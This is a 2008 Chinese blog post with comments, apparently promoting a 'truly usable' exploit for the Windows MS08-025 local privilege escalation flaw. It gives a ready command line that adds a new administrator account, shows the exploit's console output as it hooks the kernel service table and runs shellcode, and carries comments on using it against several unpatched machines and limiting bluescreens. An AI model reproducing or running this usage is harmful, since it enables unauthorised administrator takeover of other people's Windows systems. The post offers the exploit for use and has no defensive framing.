• 本地提权利器

    post by Holmesian / 2008-4-26 23:08 Saturday
    最新的
    同时也是真正可用的MS08025溢出利用程序

    经过测试,在目前打了所有补丁Win XP sp2机器上 效果非常好  

    估计在Windows 2k,xp,2k3,vista的效果都是不错的

    值得注意的是为了防止多次运行时服务器蓝屏,尽量直接用一次运行所有的命令

    比如尽量使用:
            MS08025 "cmd.exe /c net user Holmesian 123 /add & net localgroup administrators Holmesian /add"
    这样一次性执行完毕的语句



    [quote]
            Local Privilege Escalation Vulnerability Exploit(MS08025)

            Modify by [F.S.T] For 姬良

            Run paltform: Windows 2k,xp,2k3,vista

    ImageName: \WINDOWS\system32\ntkrnlpa.exe
    [*] Get KernelBase Success, ntoskrnl.exe base = 80800000
    [*] Mapping ntoskrnl.exe … ok
    [*] KeServiceDescriptorTable = 00A746E0
    [*] Find KiServiceTable … ok!!!
    [*] KiServiceTable == 8082C734
    [*] Get ZwVdmControl Number … ok!
    [*] ZwVdmControl Call Number: 0000010C
    [*] HookAddress: 8082CB64
    [*] Create execute environment … Ok!
    [*] call shellcode … Done.
    [*] Create New Process:cmd.exe /c net user Holmesian 123 /add & net localgroup administrators Holmesian /add

    命令成功完成。
    [/quote]

    说两句:

    Holmesian
    2008-04-28 17:01
    刚刚又顺便玩了几台机器  XP 和2000的

    没打这个补丁  全成功了  

    偶尔蓝屏   发现用这个的时候尽量不用runas 命令 可以减少蓝屏的可能


    还是有点用的。。。。
    吃水的蚊子
    2008-04-28 00:26
    这东西确实不好用!那天忘了是在2003的SP2上测试成功的!!我之前在一台机器上成功了几次   WinXP sp2系统  

    AMD 3600+的CPU


    有一台Dell的本本  D630   CPU是T7250的  
    Win XP SP2系统测试无反应

    在三台其他机器上测试 直接蓝屏  都是WinXP sp2的


    因为手上的服务器都有用  暂时不能拿来测试.....  

    感觉其在XP下效果很不好。。。。。
    Holmesian
    2008-04-27 10:58
    非常不错的东西

    马上就需要用了 嘿嘿


    PS:终于可以留言了。。。。

    发表评论: